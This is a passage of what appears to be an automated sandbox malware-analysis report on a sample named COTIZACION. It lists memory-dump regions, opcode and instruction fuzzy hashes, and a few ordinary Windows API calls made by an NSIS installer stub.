                                                                                                • Instruction Fuzzy Hash: 3D019231A00204CBDB14DFA5D94468AB7B1FF88312F54C265D8086F256E771EE5ACBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1587ad23680511186a9389ea555c509bf59edc48d0aff1e4aea04ade17cb9ea9
                                                                                                • Instruction ID: 049d4f6b5fd17b022d6319036eee78df1276bd182534aef9ddef6c5cfcde72c2
                                                                                                • Opcode Fuzzy Hash: 1587ad23680511186a9389ea555c509bf59edc48d0aff1e4aea04ade17cb9ea9
                                                                                                • Instruction Fuzzy Hash: 07018C79B004190BEB24A67D8490B1FA7DAEBCDB60F108939E20EC7784DA25DC0347A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13a1c27383f23c15c0756becaa1aa43a0c17d7718bc73c3c6d8327262096929
                                                                                                • Instruction ID: 1c1811610b75ce2050b705d0e77fc6abe549b61b7705d610282e3f3c5f9f03f9
                                                                                                • Opcode Fuzzy Hash: c13a1c27383f23c15c0756becaa1aa43a0c17d7718bc73c3c6d8327262096929
                                                                                                • Instruction Fuzzy Hash: 6C11E570E01384EFD701DBB4C45579D7FB2EF89300F1091A9D504AB296EA706E06AB52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11fd648f728fefa5cc1d5c59b5115b58c623148e6fe2826f04189ff66f8b9131
                                                                                                • Instruction ID: 72270ac04b90b2b61616120890a7cbfc03c086bbea403c8f8917ba31e79ed595
                                                                                                • Opcode Fuzzy Hash: 11fd648f728fefa5cc1d5c59b5115b58c623148e6fe2826f04189ff66f8b9131
                                                                                                • Instruction Fuzzy Hash: 16018C74B001154FE7149A7CC4A4B4EB7DAEB8AB50F108939E20FD7380EA21DC024792
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7413836ff09fc06bd9f4760d1be0cbffba3d31900b0d2dd82c5cbaf612eb0186
                                                                                                • Instruction ID: 115e688f338b5f59469423c3463f5ad99cc764e51d7f28fc037ab7749b30edaa
                                                                                                • Opcode Fuzzy Hash: 7413836ff09fc06bd9f4760d1be0cbffba3d31900b0d2dd82c5cbaf612eb0186
                                                                                                • Instruction Fuzzy Hash: F6012D71F113149BDB049A75E89158E77B5F789750F004539E815FB341DB31DC0187C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d65c9f9816300eee0c4fb3d9a30544a45c710c34d2e62bf0b04a26e62eb81725
                                                                                                • Instruction ID: 72dc507d61ffb3996e8488d0c78f096379e72dcf3d1957535f1172891e4b379e
                                                                                                • Opcode Fuzzy Hash: d65c9f9816300eee0c4fb3d9a30544a45c710c34d2e62bf0b04a26e62eb81725
                                                                                                • Instruction Fuzzy Hash: 6E018471E01348EBD704EFB5C855B5DBFF2EF88700F609268D604AB294FA706E01AB52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dceebb162af662ec9fa9dfacd71ea5989960aa9f93b39cbb91855219ef61b712
                                                                                                • Instruction ID: 036903ad827a8ff5fecc2e65a8ccff285a4d9da1c22ead235c3b27a37a6b9b0b
                                                                                                • Opcode Fuzzy Hash: dceebb162af662ec9fa9dfacd71ea5989960aa9f93b39cbb91855219ef61b712
                                                                                                • Instruction Fuzzy Hash: C3F0E4713182505FE705277458207AB2F76AFC7245B1600BBD249DF245DF94CD1653B2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 17a06a17f3d29c516f7253ec445613636d2b3b36e9643fbe38bb521b6eb7d370
                                                                                                • Instruction ID: 86de52f91127f02d28c1bf0cc3c302385b48e564bbd04942ff029bb7587cff7a
                                                                                                • Opcode Fuzzy Hash: 17a06a17f3d29c516f7253ec445613636d2b3b36e9643fbe38bb521b6eb7d370
                                                                                                • Instruction Fuzzy Hash: 7FF0E5313142059BE60476A99824B3F339EBFC5392F21443AE61AEB240EFA0DC0617E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b53fcc7eaa42e1bf430d94923fc36f0b0644aae3d365017d928635c1b38be37
                                                                                                • Instruction ID: 26eac50312fc8d97e710e2ffb5f7c5662ebe372e2b3bb001b8a62e4ef4711278
                                                                                                • Opcode Fuzzy Hash: 5b53fcc7eaa42e1bf430d94923fc36f0b0644aae3d365017d928635c1b38be37
                                                                                                • Instruction Fuzzy Hash: 6EF0C935B40204DFC704DB68D568A6D77B2EF88725F5441A8E5069B7A0DB30AD42CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 55808901ce547159144308d3f8bcb73d151305e058fc44b71d1c025276b40473
                                                                                                • Instruction ID: bf840be169255c218ab8753f2a56f49860ddedfe3e3d7d288b77f6cbfbb616eb
                                                                                                • Opcode Fuzzy Hash: 55808901ce547159144308d3f8bcb73d151305e058fc44b71d1c025276b40473
                                                                                                • Instruction Fuzzy Hash: 04F05CB6E003198BEF208969C484B8EB7A8E745760F00053BE50EE3280D232DC018781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23b50a8cd10665414ae3b359cc3b3fb6dc814884ff33ca0bc370c7a1f4b59709
                                                                                                • Instruction ID: 2f24452ef5c50a1b9e44a1200b1c3c3e47b4984eae9ced2c7e65768b6831720f
                                                                                                • Opcode Fuzzy Hash: 23b50a8cd10665414ae3b359cc3b3fb6dc814884ff33ca0bc370c7a1f4b59709
                                                                                                • Instruction Fuzzy Hash: 3FE080B5E1A1455BEB41CE70864578B766DD711209F2585F5D40CD7141E175CB018740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4b336f63c46d7b794573831fe82398c4354c562626b298a6147f0a6eb6667247
                                                                                                • Instruction ID: 76dd1f6fe3571a2a23d3482adee63d45bb1d42ed7c0b19648137d2fe93769ba0
                                                                                                • Opcode Fuzzy Hash: 4b336f63c46d7b794573831fe82398c4354c562626b298a6147f0a6eb6667247
                                                                                                • Instruction Fuzzy Hash: B8E0C2323252608FCB06576CA4205D937F69FCB76331101EFE049DF363CA218C0A8752
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7fd7157497172c9f318bf98a4fb67287a8229482c769d0760730e91a53415355
                                                                                                • Instruction ID: 996783d6cd48fd53c0aa1e0c72f2b2c00c5007ab81492ad72e175c0f4d113d27
                                                                                                • Opcode Fuzzy Hash: 7fd7157497172c9f318bf98a4fb67287a8229482c769d0760730e91a53415355
                                                                                                • Instruction Fuzzy Hash: E8D05E313500249B4A08B36CA45186A33E99BCE752710057FF81ADB352CE919C06578A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eb86245984f0cd2a05177bfeacf305eb974bff153167f33d8eb0394e9dd29e1a
                                                                                                • Instruction ID: 469ca84da699b227380cfcd784553d628c0effb4451f7177cb68d69e73ee99bb
                                                                                                • Opcode Fuzzy Hash: eb86245984f0cd2a05177bfeacf305eb974bff153167f33d8eb0394e9dd29e1a
                                                                                                • Instruction Fuzzy Hash: 4FD09722D093049FD32E829C69043523BDA6B0C307F49409AE82ECB281E3508E0983C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c37866088a592a77aa80da72d2c73072c4dea385fe2f189554cf93dfd540c73
                                                                                                • Instruction ID: fa7b6082b25042b39c60e953cc882a08083e02a9e9deb9018b80cb784b02879b
                                                                                                • Opcode Fuzzy Hash: 8c37866088a592a77aa80da72d2c73072c4dea385fe2f189554cf93dfd540c73
                                                                                                • Instruction Fuzzy Hash: FCD0A734A05714DBC33CDA59D104653B7DAFB4C715B854419E45787A40C7A0FD0587C0
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorModeVersion
                                                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                                                • API String ID: 3050056751-1170945346
                                                                                                • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                                • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                                                • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                                • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                • wsprintfW.USER32 ref: 004061CF
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                • API String ID: 2200240437-1946221925
                                                                                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                                • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                                • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                                  • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                  • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                                  • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                                • API String ID: 2547128583-890815371
                                                                                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                                • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                                • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD